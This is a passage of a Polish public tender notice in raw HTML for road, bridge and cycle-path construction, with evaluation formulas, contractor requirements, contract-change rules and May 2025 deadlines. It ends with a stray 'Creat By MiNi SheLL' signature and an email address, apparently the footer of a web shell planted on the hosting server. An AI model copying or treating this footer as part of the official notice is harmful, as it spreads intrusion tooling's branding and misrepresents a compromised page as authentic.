zakresie budowy mostów i tuneli, szybów i kolei podziemnej</p> <p class="mb-0">44132000-4 - Elementy przepustów</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">45232451-8 - Roboty odwadniające i nawierzchniowe</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.1.	Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert:<br/>Lp.	Nazwa kryterium	Znaczenie kryterium (w %)<br/>1	Cena (C)	60<br/>2	Długość okresu gwarancji na cały przedmiot zamówienia (G)	25<br/>3	Doświadczenie głównego projektanta b. drogowej (D)	15<br/>17.2.	Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1 punkt.<br/>Ocena oferty (O) – znaczenie 100 pkt<br/>Liczba punktów uzyskanych przez daną ofertę wyliczona będzie wg wzoru:<br/>O = C + G + D<br/>gdzie:<br/>O – suma punktów uzyskanych przez daną ofertę we wszystkich kryteriach<br/>C – liczba punktów uzyskanych przez daną ofertę w kryterium „Cena”<br/>G – liczba punktów uzyskanych przez daną ofertę w kryterium „Długość okresu gwarancji na cały przedmiot zamówienia”<br/>D – liczba punktów uzyskanych przez daną ofertę w kryterium „Doświadczenie głównego projektanta b. drogowej”<br/>17.3.	Maksymalna liczba punktów, jaką może uzyskać Wykonawca wynosi – 100 punktów. Punkty przyznane zostaną obliczone dla każdego z kryteriów oddzielnie. Suma punktów uzyskanych za wszystkie kryteria oceny stanowić będzie końcową ocenę danej oferty (O).<br/>17.4.	Punkty przyznawane za podane kryterium będą liczone według następujących wzorów:<br/>1)	C = CN / COB x 60 % x 100<br/>gdzie:<br/>C – liczba punktów uzyskanych przez daną ofertę w kryterium „Cena”<br/>CN – najniższa zaoferowana cena brutto, spośród ważnych ofert<br/>COB – cena brutto zaoferowana w ofercie badanej<br/>2)	G = GOB x 25 % x 100<br/>gdzie:<br/>G – liczba punktów uzyskanych przez daną ofertę w kryterium „Długość okresu gwarancji na cały przedmiot zamówienia”<br/>GOB – okres gwarancji podany w badanej ofercie, liczony w miesiącach<br/>a)	Wykonawca może zaproponować okres gwarancji (GOB) w następujących okresach:<br/>	36 miesięcy<br/>	42 miesiące<br/>	48 miesięcy<br/>	54 miesiące<br/>	60 miesięcy<br/>b)	Faktyczna ilość punktów zostanie obliczona następująco (GOB):<br/>	okres gwarancji 36 miesięcy – 0,00 pkt<br/>	okres gwarancji 42 miesiące – 0,25 pkt<br/>	okres gwarancji 48 miesięcy – 0,50 pkt<br/>	okres gwarancji 54 miesiące – 0,75 pkt<br/>	okres gwarancji 60 miesięcy – 1,00 pkt<br/>c)	Minimalny wymagany okres gwarancji wynosi 36 miesięcy. Oferta z gwarancją krótszą niż wymagane minimum zostanie odrzucona jako niezgodna z treścią SWZ (na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp).<br/>d)	Wykonawca może zaproponować długość okresu gwarancji dłuższy niż wyznaczony maksymalny 60 miesięcy, jednak w tym przypadku Zamawiający przyjmie do obliczeń wartość 60 m-cy – najdłuższy przyjęty w kryterium oceny ofert „Długość okresu gwarancji na cały przedmiot zamówienia”.<br/>e)	Okres gwarancji dla całego przedmiotu zamówienia liczy się od daty podpisania końcowego protokołu odbioru całego przedmiotu zamówienia.<br/>f)	W przypadku braku podania okresu gwarancji w ofercie, Zamawiający odrzuci ofertę Wykonawcy na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>3)	Doświadczenie głównego projektanta b. drogowej (D) – punkty będą przyznawane w skali od 0,00 do 15,00 punktów (1 pkt = 1 %), na podstawie oświadczenia Wykonawcy złożonego w ofercie (Załącznik nr 3 – Formularz ofertowy „Kryteria poza cenowe”)<br/>a)	W ramach przedmiotowego kryterium punkty będą przyznawane za ilość zadań dot. doświadczenia zawodowego projektanta głównego branży drogowej przy opracowaniu dokumentacji projektowej, której zakres obejmował budowę lub przebudowę lub rozbudowę drogi lub ciągu (ścieżki) pieszo-rowerowego lub ciągu (ścieżki) rowerowej o nawierzchni bitumicznej wraz z uzyskaniem decyzji zezwalającej na realizację inwestycji drogowej (ZRID).<br/>b)	punkty przyznawane będą za określoną ilość zdobytego doświadczenia zawodowego (D):<br/>	za 1 zadanie potwierdzające powyższe kryterium Wykonawca otrzyma 5,00 punktów,<br/>	za 2 zadania potwierdzające powyższe kryterium Wykonawca otrzyma 10,00 punktów,<br/>	za 3 lub więcej zadań potwierdzających powyższe kryterium Wykonawca otrzyma 15,00 punktów,<br/>	(...)<br/>Ze względu na ograniczoną ilość znaków pozostałe informacje znajdują się w Rozdziale 17 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji na cały przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie głównego projektanta b. drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.1.4.	Zdolności technicznej lub zawodowej w zakresie (opis sposobu dokonywania oceny spełniania tego warunku):<br/>1)	Wykonawca winien wykazać, że wykonał należycie oraz zgodnie z przepisami prawa budowlanego i prawidłowo ukończył nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: co najmniej jedną robotę budowlaną o wartości minimum 3.000.000,00 zł brutto (trzy miliony złotych brutto), która polegała na budowie lub przebudowie lub rozbudowie drogi albo ścieżki (ciągu) rowerowej albo ścieżki (ciągu) pieszo-rowerowej o nawierzchni bitumicznej.<br/>2)	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują lub będą dysponować w okresie wykonywania zamówienia i skierują do jego realizacji nw. osoby, w tym co najmniej:<br/>a)	jedną osobę (projektant główny) posiadającą uprawnienia budowlane do projektowania w specjalności inżynieryjnej drogowej bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, w zakresie obejmującym przedmiot zamówienia,<br/>b)	jedną osobę posiadającą uprawnienia mostowe do projektowania w specjalności inżynieryjnej mostowej lub odpowiadające im równoważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, w zakresie obejmującym przedmiot zamówienia<br/>c)	jedną osobę kierownika budowy posiadającego uprawnienia drogowe do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej bez ograniczeń, w zakresie obejmującym przedmiot zamówienia<br/>d)	jedną osobę kierownika robót posiadającego uprawnienia mostowe do kierowania robotami budowlanymi w specjalności inżynieryjnej mostowej, w zakresie obejmującym przedmiot zamówienia; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">8.3.1.	W celu potwierdzenia spełniania warunków udziału w postępowaniu nw. dokumenty/oświadczenia:<br/>1)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane (sporządzonego zgodnie z Załącznikiem Nr 7 do SWZ), oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie; dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów – inne odpowiednie dokumenty – w odniesieniu do warunku określonego w pkt 6.1.4. ppkt 1) SWZ,<br/>	Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi Wykonawcami, ww. wykaz robót, dotyczy robót budowlanych, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył;<br/>2)	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (sporządzonego zgodnie z Załącznikiem Nr 8 do SWZ) – w odniesieniu do warunku określonego w pkt 6.1.4. ppkt 2) SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 13.8.	Oferta musi zawierać następujące oświadczenia i dokumenty:<br/>1)	Formularz ofertowy – do wykorzystania wzór (druk), stanowiący Załącznik nr 3 do SWZ (przy czym Wykonawca może sporządzić ofertę wg innego wzorca - powinna ona wówczas obejmować dane wymagane dla oferty w SWZ i załącznikach);<br/>2)	Oświadczenia o których mowa w pkt 8.1. SWZ – Załącznik nr 4 i 5 do SWZ;<br/>3)	Oświadczenie, o którym mowa w pkt 8.2. SWZ (jeżeli dotyczy) – Załącznik nr 6 do SWZ;<br/>4)	Zobowiązanie lub inne dokumenty, o których mowa w pkt 9.4. SWZ (jeżeli dotyczy) – Załącznik nr 9 do SWZ;<br/>5)	Potwierdzenie umocowania do działania w imieniu wykonawcy lub podmiotu udostępniającego zasoby:<br/>a)	jeżeli w imieniu Wykonawcy lub podmiotu udostępniającego zasoby działa osoba, której umocowanie do jego reprezentowania nie wynika z informacji ogólnodostępnych zawartych w Krajowym Rejestrze Sądowym, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innym właściwym rejestrze, Zamawiający żąda od Wykonawcy lub podmiotu udostępniającego zasoby do złożenia wraz z ofertą pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania. <br/>6)	Pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 10.1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>10.2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>1)	oświadczenia o których mowa w pkt 8.1. SWZ składa z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji.<br/>2)	w przypadku, o którym mowa w pkt 6.5. SWZ wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. Oświadczenie należy złożyć wg wymogów załącznika nr 6 do SWZ. Oświadczenie to jest podmiotowym środkiem dowodowym.<br/>3)	zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w pkt 8.3. SWZ, przy czym podmiotowe środki dowodowe, o których mowa:<br/>	w pkt 8.3.1. SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku;<br/>10.3.	Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/>10.4.	Wykonawcy wspólnie ubiegających się o udzielenie zamówienia, ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.<br/><br/>6.4.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, co najmniej jeden z Wykonawców powinien wykazać spełnienie warunku określonego w pkt 6.1.4 ppkt 1) lub 2) SWZ.<br/>6.5.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykazując warunek udziału w postępowaniu mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość zmian i uzupełnień postanowień zawartej umowy. Strony dopuszczają dokonywanie zmian treści umowy, w następujących okolicznościach:<br/>1)	dopuszcza się wprowadzenie zmian i uzupełnień za zgodą Stron umowy, <br/>2)	zmiany mogą być inicjowane przez Zamawiającego lub przez Wykonawcę,<br/>3)	zmiany umowy, o których mowa w pkt 1) powyżej muszą być dokonywane z zachowaniem przepisu art. 454 oraz art. 455 ustawy Pzp.<br/>2.	Dopuszczalne zmiany odnoszące się do przedmiotu zamówienia:<br/>1)	Dopuszczalna jest zmiana przedmiotu zamówienia poprzez zmianę zakresu robót budowlanych przewidzianych w dokumentacji projektowej/technicznej w przypadku:<br/>a)	konieczności wykonania robót, których wykonanie ma na celu prawidłowe zrealizowanie przedmiotu zamówienia, a konieczność ich wykonania wynika z zasad wiedzy technicznej, uzasadnionych potrzeb Zamawiającego lub gdy wystąpiły wady dokumentacji projektowej/technicznej,<br/>b)	konieczności wykonania robót niezbędnych do prawidłowego wykonania przedmiotu zamówienia, które nie zostały przewidziane w dokumentacji projektowej/technicznej opracowanej przez Wykonawcę, a bez których osiągnięcie celu zamówienia nie jest możliwe,<br/>c)	zmiany dokumentacji projektowej/technicznej wykonane z inicjatywy Zamawiającego ze względu na stwierdzone Wady, co spowoduje konieczność wykonania robót zamiennych,<br/>d)	zmiany decyzji administracyjnych, zezwoleń, uzgodnień oraz opinii podmiotów zewnętrznych na podstawie których prowadzone są roboty budowlane objęte przedmiotem zamówienia, powodujące zmianę dotychczasowego zakresu robót przewidzianego w dokumentacji projektowej/technicznej lub innych dokumentach opisujących przedmiot zamówienia<br/>2)	Dopuszczalna jest zmiana zakresu robót budowlanych poprzez ich ograniczenie w sytuacji, gdy wykonanie niektórych robót okazało się zbędne, zmieniły się okoliczności związane z wykonaniem niniejszej umowy lub wykonanie poszczególnych robót nie leży w interesie publicznym lub Zamawiającego, z zastrzeżeniem, że zakres robót nie może ulec zmianie o więcej niż 30 % zakresu rzeczowego lub finansowego przedmiotu zamówienia. <br/>	W takim przypadku wynagrodzenie Wykonawcy zmniejsza się odpowiednio w stosunku do zmniejszonego zakresu robót z uwzględnieniem mechanizmu opisanego w 6 niniejszego Rozdziału.<br/>3)	Dopuszczalna jest zmiana przedmiotu zamówienia, w szczególności zmiana sposobu wykonania przedmiotu Umowy, zakresu robót, lokalizacji robót w sytuacji:<br/>a)	wystąpienia innych warunków geologicznych, geotechnicznych, hydrologicznych, niż te wskazane w dokumentacji projektowej/technicznej lub innych dokumentach opisujących przedmiot zamówienia, powodujących konieczność zmiany sposobu wykonania przedmiotu zamówienia,<br/>b)	wystąpienia na terenie budowy niewybuchów, niewypałów lub znalezisk archeologicznych, które uniemożliwiają lub utrudniają wykonanie robót na warunkach przewidzianych w niniejszej umowie,<br/>c)	zmiany po upływie terminu składania ofert powszechnie obowiązujących przepisów prawa, które miały wpływ na możliwość wykonania przedmiotu zamówienia,<br/>d)	wystąpienia siły wyższej, która uniemożliwiła lub istotnie ograniczyła możliwość wykonania przedmiotu zamówienia albo jego części w sposób określony w niniejszej umowie lub dokumentach zamówienia;<br/>4)	Dopuszczalna jest zmiana technologii wykonania robót lub materiałów przewidzianych w dokumentacji projektowej/technicznej lub innych dokumentach opisujących przedmiot zamówienia, jeżeli w wyniku rozwoju technicznego lub technologicznego możliwe jest wykonanie robót przy zastosowaniu innej technologii lub materiałów, które:<br/>a)	podwyższą jakość wykonanych robót, lub<br/>b)	zmniejszą koszty realizacji przedmiotu zamówienia lub koszty eksploatacji przedmiotu zamówienia, lub<br/>c)	pozwolą na skrócenie terminu wykonania umowy, lub<br/>d)	(...)<br/>Ze względu na ograniczoną ilość znaków, szczegółowe informacje o zmianach umowy znajdują się w Projekcie Umowy<br/>stanowiącym Załącznik Nr 2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-21 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy złożyć za pośrednictwem Platformy zakupowej: platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/popielow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-21 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-19</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 25.1.	Zamawiający:<br/>1)	nie przewiduje wyboru najkorzystniejszej oferty z możliwością przeprowadzenia negocjacji,<br/>2)	nie dopuszcza składania ofert częściowych,<br/>3)	nie dopuszcza składania ofert wariantowych,<br/>4)	nie przewiduje wymagań wskazanych w art. 96 ust. 2 pkt 2 ustawy Pzp,<br/>5)	nie przewiduje wymagań wskazanych w art. 94 ustawy Pzp,<br/>6)	nie przewiduje zamówień, o których mowa w art. 214 ust. 1 pkt 7 i 8 ustawy Pzp,<br/>7)	nie wymaga przeprowadzenia przez Wykonawcę obowiązkowej wizji lokalnej lub sprawdzenia przez niego dokumentów niezbędnych do realizacji zamówienia, o których mowa w art. 131 ust. 2 ustawy Pzp,<br/>8)	nie przewiduje rozliczenia między Zamawiającym a Wykonawcą w walutach obcych,<br/>9)	nie przewiduje zwrotu kosztów udziału w postępowaniu,<br/>10)	nie wymaga obowiązku osobistego wykonania przez Wykonawcę kluczowych zadań zgodnie z art. 60 i art. 121 ustawy Pzp,<br/>11)	nie przewiduje zawarcia umowy ramowej,<br/>12)	nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej wraz z informacjami, o których mowa w art. 230 ustawy Pzp,<br/>13)	nie stawia wymogu lub możliwości złożenia ofert w postaci katalogów elektronicznych lub dołączenia katalogów elektronicznych do oferty, w sytuacji określonej w art. 93 ustawy Pzp,<br/>14)	nie przewiduje udzielenia zaliczek na poczet wykonania zamówienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com